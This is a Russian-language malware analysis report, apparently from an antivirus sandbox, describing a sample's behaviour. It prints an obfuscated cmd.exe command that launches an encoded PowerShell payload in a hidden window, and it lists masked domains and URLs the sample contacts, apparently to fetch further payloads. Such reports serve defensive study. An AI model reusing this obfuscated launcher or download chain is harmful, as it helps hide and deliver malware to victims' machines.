Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V /C "set %EKwKkmmYn%=nwmrrUiiL&&set %IXnEnQnUA%=p^o^we^rs&&set %uqivDFBlw%=ttEzJSCzL&&set %dVsEwlDVw%=he^ll&&set %zPUfiREMj%=dKdmAljzn&&!%IXnEnQnUA%!!%dVsEwlDVw%! ^-^e IAAmACgAIAAkAHMASABlAEw...
Сетевая активность
Подключается к
- 'br##rart.de':80
- 'br###art.com':80
- 'gh###emann.de':80
- 'ra###usen.cz':80
- 'oz##ink.com':80
- 'bl######uecampers.com.au':80
- 'bl######uecampers.com.au':443
TCP
Запросы HTTP GET
- http://br##rart.de/cwNZ/
- http://br###art.com/cwNZ
- http://gh###emann.de/pqJnj/
- http://ra###usen.cz/snRa/
- http://oz##ink.com/qxsSpQJT/
- http://bl######uecampers.com.au/jQLpIlbor/
Другие
- 'bl######uecampers.com.au':443
UDP
- DNS ASK br##rart.de
- DNS ASK br###art.com
- DNS ASK gh###emann.de
- DNS ASK ra###usen.cz
- DNS ASK oz##ink.com
- DNS ASK bl######uecampers.com.au
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V /C "set %EKwKkmmYn%=nwmrrUiiL&&set %IXnEnQnUA%=p^o^we^rs&&set %uqivDFBlw%=ttEzJSCzL&&set %dVsEwlDVw%=he^ll&&set %zPUfiREMj%=dKdmAljzn&&!%IXnEnQnUA%!!%dVsEwlDVw%! ^-^e IAAmACgAIAAkAHMASABlAEw...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACgAIAAkAHMASABlAEwAbABJAEQAWwAxAF0AKwAkAFMAaABFAGwAbABJAGQAWwAxADMAXQArACcAWAAnACkAIAAoACAAWwBzAHQAcgBJAG4ARwBdADoAOgBKAG8ASQBuACgAJwAnACwAIABbAGMAaABhAFIAWwBdAF0AKAAgADMANgAgACwAMQAxAD...
